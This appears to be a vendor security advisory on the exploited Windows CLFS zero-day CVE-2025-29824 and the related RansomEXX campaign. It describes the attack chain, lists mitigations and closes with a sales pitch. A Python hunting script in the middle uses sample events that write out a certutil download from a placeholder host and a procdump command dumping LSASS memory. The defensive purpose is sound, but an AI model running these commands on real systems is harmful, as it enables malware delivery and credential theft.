Microsoft has swiftly released a patch to address a critical zero-day privilege escalation vulnerability within the Windows Common Log File System (CLFS).
Key Highlights:
- Critical Vulnerability: Identified as CVE-2025-29824, this flaw allows attackers to gain elevated system privileges, establishing a strong foothold for ransomware deployment.
- Threat Actor: The attack campaign is attributed to the Storm-2460 group, which uses the PipeMagic malware to deliver its ransomware payloads.
- Diverse Targets: Attacks have been recorded against organizations in the information technology sector, real estate (USA), finance (Venezuela), a software company (Spain), and the retail industry (Saudi Arabia).
- Rapid Response: Microsoft issued an emergency security patch on April 8, 2025, to resolve and mitigate the impact of this actively exploited vulnerability.
Decoding the Attack Chain:
The vulnerability lies in the CLFS kernel driver, a core Windows component; exploiting it grants attackers a higher privilege level than the one they started with at initial entry. Storm-2460 employed advanced techniques, including:
- Kernel Address Leak: Using the NtQuerySystemInformation API to gather sensitive kernel-level memory addresses.
- Token Manipulation: Exploiting the RtlSetAllBits API to effectively seize control of processes.
Notably, Windows 11 (version 24H2) offers enhanced protection against this specific exploit, as access to certain system information crucial for the exploit is restricted to users with SeDebugPrivilege.
Attack Scenario:
Initial Intrusion: Attackers first used the legitimate certutil utility to download a malicious MSBuild file hosted on compromised third-party websites. This file contained the encrypted PipeMagic malware.
Privilege Escalation: The CLFS zero-day was then exploited from a dllhost.exe process to obtain elevated access rights.
Post-Exploitation: The attacker injects code into winlogon.exe, then uses a Sysinternals utility to dump the memory of the LSASS service process (lsass.exe) in order to extract user credentials from the captured memory.
Ultimately, ransomware was deployed, encrypting victim files and appending random file extensions. A ransom note named !READ_ME_REXX2!.txt is dropped, containing two .onion domains associated with the RansomEXX ransomware family.
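A defender-side illustration of the chain described above, added here as an example that is not code from the original article or from Microsoft: it runs simple stage detections over constructed process-creation and file-creation records. The record field names, the sample command lines and the choice of procdump.exe as the Sysinternals tool are assumptions of this example.

```python
import re

# Constructed sample telemetry (not real logs): simplified process-creation and
# file-creation records loosely modelled on Sysmon Event IDs 1 and 11. Field
# names, paths and command lines are assumptions of this example.
SAMPLE_EVENTS = [
    {"type": "process", "parent": "cmd.exe", "image": "certutil.exe",
     "cmdline": "certutil -urlcache -split -f http://example.invalid/p.xml p.xml"},
    {"type": "process", "parent": "dllhost.exe", "image": "cmd.exe",
     "cmdline": "cmd.exe /c whoami"},
    {"type": "process", "parent": "winlogon.exe", "image": "procdump.exe",
     "cmdline": "procdump.exe -ma lsass.exe l.dmp"},
    {"type": "file", "image": "unknown.exe",
     "path": r"C:\Users\alice\Documents\!READ_ME_REXX2!.txt"},
    {"type": "process", "parent": "explorer.exe", "image": "notepad.exe",
     "cmdline": "notepad.exe notes.txt"},
]

URL_RE = re.compile(r"https?://", re.I)
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "rundll32.exe"}
RANSOM_NOTE = "!READ_ME_REXX2!.txt"   # ransom note name reported in the article

def classify(event):
    """Return the stage of the reported chain an event matches, or None."""
    if event["type"] == "file":
        if event["path"].lower().endswith(RANSOM_NOTE.lower()):
            return "impact: RansomEXX ransom note written"
        return None
    image, parent = event["image"].lower(), event.get("parent", "").lower()
    cmd = event.get("cmdline", "").lower()
    if image == "certutil.exe" and URL_RE.search(cmd):
        return "initial access: certutil fetching a remote file"
    if parent == "dllhost.exe" and image in SHELLS:
        return "privilege escalation: shell spawned by dllhost.exe"
    # any non-LSASS process naming lsass.exe on its command line (here under winlogon.exe)
    if "lsass" in cmd and image != "lsass.exe":
        return "credential access: process targeting lsass.exe"
    return None

def hunt(events):
    """Return (index, stage) pairs for every event that matches a stage."""
    return [(i, s) for i, e in enumerate(events) if (s := classify(e))]

if __name__ == "__main__":
    for i, stage in hunt(SAMPLE_EVENTS):
        print(f"event {i}: {stage}")
```

Real deployments would run these checks against EDR or Sysmon output, where the dllhost.exe and winlogon.exe parent relationships are the strongest signals because both are rarely legitimate parents of shells or dumping tools.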
Immediate and Critical Actions:
- Apply the Security Update Immediately: Microsoft released security updates to address CVE-2025-29824. Customers running Windows 11, version 24H2 are not affected.
- Enable Cloud-Delivered Protection: Activate and verify cloud-delivered protection within Microsoft security solutions (e.g., Microsoft Defender Antivirus). This provides real-time behavioral analysis and detection of the latest threats based on cloud intelligence.
- Utilize Device Discovery: Deploy and configure device discovery tools to gain comprehensive visibility into all devices on the network, identifying potentially unmanaged or unpatched systems. This ensures all assets are protected and monitored.
- Run EDR in Block Mode: If you use an EDR solution such as Microsoft Defender for Endpoint, configure it to operate in block mode so that detected malicious activity is stopped automatically, minimizing the impact of an attack by halting suspicious behavior before damage occurs.
- Enable Full Automation for Investigation and Remediation: Configure security solutions to automatically investigate alerts and take the necessary remediation actions without waiting for manual intervention. This enables rapid response to threats and reduces the attacker's dwell time within the system.
- Implement Regular and Secure Data Backups: Establish automated and frequent data backup procedures, ensuring backups are stored securely and separately from the primary system (e.g., offline or in the cloud).
- Access Control: Implement the principle of least privilege, granting users and applications only the access they need to do their jobs.
- Monitor and Analyze Logs: Set up security log monitoring and analysis systems to detect suspicious activities or early signs of intrusion.
- Enforce Multi-Factor Authentication (MFA): Mandate MFA for all user accounts, especially those with administrative privileges or access to sensitive data.
- Conduct Regular Security Audits: Perform periodic security assessments and penetration testing to identify potential vulnerabilities in systems and applications.
- Enhance User Awareness: Conduct training or provide information to users about ransomware threats, how to identify suspicious emails or attachments, and the importance of adhering to security policies.
Protect Your Organization with ITM’s Advanced Security Solutions
In today’s rapidly evolving threat landscape, vigilance and proactive measures are essential. Microsoft’s swift response to the zero-day exploit and ransomware campaign highlights the need for robust security strategies. To further safeguard your organization or address any IT concerns, don’t hesitate to reach out to us. With ITM, you can enhance your defenses and stay one step ahead of cyber threats.
Take Action Now – Explore ITM’s Security Services and Secure your digital assets today!